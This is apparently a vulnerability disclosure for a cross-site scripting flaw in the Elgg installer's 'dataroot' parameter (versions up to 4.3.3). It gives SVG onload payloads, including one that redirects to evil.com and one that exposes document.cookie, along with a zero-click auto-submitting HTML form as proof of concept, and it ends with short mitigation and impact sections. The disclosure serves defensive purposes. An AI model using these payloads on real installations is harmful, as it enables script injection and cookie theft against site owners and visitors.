Description

The installation page in Elgg ≤ v4.3.3 is vulnerable to Cross-Site Scripting attack via 'dataroot' parameter.

Steps to Reproduce

1. Freshly install the Elgg in your web-server and proceed to "Database Installation Page".

2. Enter the following payload in "Data Directory" field and fill other field and click on next button.

<svg/onload=confirm(/XSS/)>
<svg/onload=confirm(document.location="https://evil.com")>
<svg/onload=confirm(document.cookie)>

3.Cross Site Scripting will be triggered.

The cross site scripting vulnerability can be triggered with 0 click interaction too. Open the following html file in any web-browser, replace localhost with your server's address & xss will be triggered.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/sites/11/install.php?step=database" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="dbuser" value="suvam" />
      <input type="hidden" name="dbpassword" value="" />
      <input type="hidden" name="dbname" value="elgg" />
      <input type="hidden" name="dbhost" value="localhost" />
      <input type="hidden" name="dbport" value="3306" />
      <input type="hidden" name="dbprefix" value="elgg&#95;" />
      <input type="hidden" name="dataroot" value="&lt;svg&#47;onload&#61;confirm&#40;&#47;xss&#47;&#41;&gt;" />
      <input type="hidden" name="wwwroot" value="http&#58;&#47;&#47;localhost&#47;sites&#47;11&#47;" />
      <input type="hidden" name="timezone" value="UTC" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Proof of Concept :

https://drive.google.com/file/d/1SWU86vsD_i1sMy6xQVsXCZCAERGOO_EW/view?usp=sharing

Mitigation

Proper encoding of users input must be done before passing into HTTP response body.

Impact

Attacker is able to execute malicious javascript in victims browser that can be exploited for various malicious purpose.